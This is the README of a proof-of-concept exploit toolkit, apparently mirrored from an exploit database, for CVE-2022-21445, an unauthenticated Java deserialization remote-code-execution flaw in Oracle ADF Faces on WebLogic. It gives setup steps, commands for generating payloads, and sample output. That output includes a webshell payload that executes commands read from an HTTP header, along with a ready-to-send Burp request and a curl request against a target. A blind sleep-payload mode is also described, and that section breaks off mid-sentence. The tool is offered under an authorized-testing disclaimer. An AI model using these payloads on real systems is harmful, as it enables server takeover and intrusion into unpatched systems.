Share
## https://sploitus.com/exploit?id=08B42BFC-3C65-5C4B-984D-082A533898C9
# CVE-2022-21445 Exploit - PoC

This toolkit generates exploit payloads for CVE-2022-21445, a critical Java deserialization vulnerability in Oracle ADF Faces `RemoteApplicationResourceLoader`. The exploit achieves **unauthenticated Remote Code Execution** via a crafted GET request.

## Prerequisites

| Requirement | Version | Purpose |
|-------------|---------|---------|
| **Python** | 3.6+ | Run the exploit script |
| **JDK** | 1.8 (8u202 recommended) | Compile and run Java payload generator |

---

## Setup Guide

### Install JDK 1.8

The payload **must** be compiled with JDK 1.8 to match the target's Java runtime.

```bash
# Use SDKMAN:
sdk install java 8.0.402-tem

# Select the java 8
sudo update-alternatives --config java
```

```bash
java -version    # Should show 1.8.x
javac -version   # Should show 1.8.x
```

### Optional - Install Docker (Use in case of Broken Jar)

This extracts the required Oracle JARs from the official FMW Infrastructure Docker image.

```bash
# Create the libs directory
mkdir -p libs/12.2.1.3
#or
mkdir -p libs/12.2.1.3

# Pull the Oracle FMW Infrastructure 12.2.1.3 or 12.2.1.4 image
# Note: You may need to accept the license at container-registry.oracle.com
docker pull container-registry.oracle.com/middleware/fmw-infrastructure:12.2.1.3.0
#OR
docker pull container-registry.oracle.com/middleware/fmw-infrastructure:12.2.1.4.0

#Let's say we need the JARs of 12.2.1.4 version (in case of 12.2.1.3 just replace .4 with .3 in the commands)

# Create a temporary container (don't need to start it)
docker create --name fmw1214_temp container-registry.oracle.com/middleware/fmw-infrastructure:12.2.1.4.0

# Extract the required JARs
docker cp fmw1214_temp:/u01/oracle/coherence/lib/coherence.jar ./libs/12.2.1.4/coherence.jar

docker cp fmw1214_temp:/u01/oracle/oracle_common/modules/oracle.adf.view/adf-richclient-api-11.jar ./libs/12.2.1.4/adf-richclient-api-11.jar

docker cp fmw1214_temp:/u01/oracle/oracle_common/modules/oracle.adf.view/adf-richclient-impl-11.jar ./libs/12.2.1.4/adf-richclient-impl-11.jar

docker cp fmw1214_temp:/u01/oracle/oracle_common/modules/oracle.adf.view/trinidad-api.jar ./libs/12.2.1.4/trinidad-api.jar

docker cp fmw1214_temp:/u01/oracle/oracle_common/modules/oracle.adf.view/trinidad-impl.jar ./libs/12.2.1.4/trinidad-impl.jar
```

> **Note:** The `javax.mail` JAR (needed for MIME base64 encoding) is **automatically downloaded** from Maven Central on first run. No manual setup required. The webshell payload uses pure reflection and does **not** need `weblogic.jar` at compile time.

## Usage

### Generate a Webshell Payload

Creates a payload that reads commands from the `cmd` HTTP header and returns output in the response body.

```bash
python3 exploit.py --version 12.2.1.4 --type webshell
```

Output:
```
[*] Target WebLogic version: 12.2.1.4
[*] Payload type: webshell
[*] Using JARs from: libs/12.2.1.4
[+] Step 1/4: Detecting ClassIdentity hash for 12.2.1.4...
[*] Detected ClassIdentity hash: 423B02C050017B24DB10DFF759AA56BF
[+] Step 2/4: Generating webshell payload class...
[+] Step 3/4: Compiling payload classes...
[+] Step 4/4: Generating serialized payload...

======================================================================
  PAYLOAD GENERATED SUCCESSFULLY
======================================================================

[*] Payload type: webshell
[*] Payload length: 2156 characters

โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
RAW PAYLOAD:
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
H4sIAAAAAAAAAA%3D%3DlVZb...

โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
BURP REPEATER REQUEST:
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
GET /app/afr/foo/remote/H4sIAAAAAAAAAA%3D%3DlVZb.../ HTTP/1.1
Host: target:port
cmd: whoami
Connection: close

โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
CURL COMMAND:
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
curl -k -H "cmd: id" "https://target:port/app/afr/foo/remote/H4sI.../"
```

### Generate a Sleep (Blind) Payload

For blind testing โ€” confirms code execution if the response is delayed.

```bash
python3 exploit.py --version 12.2.1.4 --type sleep --sleep-time 10
```

Send the payload and measure response time:
- **~10 seconds:** Code execution confirmed
- **Instant (

---

## Disclaimer

This tool is intended for **authorized security testing only**. Always obtain written permission before testing systems you do not own. The authors are not responsible for any misuse. Unauthorized access to computer systems is illegal.

---

## References

- [Oracle Critical Patch Update Advisory - April 2022](https://www.oracle.com/security-alerts/cpuapr2022.html)
- [CVE-2022-21445 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2022-21445)
- [hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic](https://github.com/hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic)